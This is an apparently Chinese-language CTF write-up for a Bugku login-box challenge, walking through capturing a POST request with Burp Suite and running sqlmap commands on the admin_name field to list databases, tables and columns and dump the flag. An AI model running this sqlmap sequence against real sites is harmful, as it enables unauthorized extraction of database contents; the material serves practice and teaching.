Day32
這是一個神奇的登陸框
flag格式flag{}

本題要點:sqlmap神器使用、burpsuit抓包
查看一下源碼

是post提交,url明顯提示是個sql注入,由於post提交,要sql和burp結合起來使用。
首先burp抓包,抓到包后選擇存到txt文件中:(隨便輸入賬號密碼)

我保存到了D:\1.txt
然后打開sqlmap,輸入指令:sqlmap.py -r "D:\1.txt" -p admin_name --dbs
解釋一下 -r是讀文件 后面是剛才保存的絕對路徑,-p是參數,也就是注入點(選了admin_name是注入點) --dbs意思是想獲取數據庫名字
可以看到sqlmap獲得了數據庫的名字:

應該是這個bugkul1,再繼續爆表,命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解釋:-D是表示選擇了后面的這個數據庫 --tables是想獲取表
可以看到爆出了表:

應該在flag1這個表里,繼續爆列名:
命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解釋類似上面 不過加了一個-T 指定表
可以發現爆出了列名:

flag1這個列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
解釋:同上面 --dump是獲取字段的命令
(在這過程中可能會讓你選擇Y或者N 我直接回車的)
可以看到爆出了flag:

完成!
最后多一句~
sqlmap是真的好用!!!!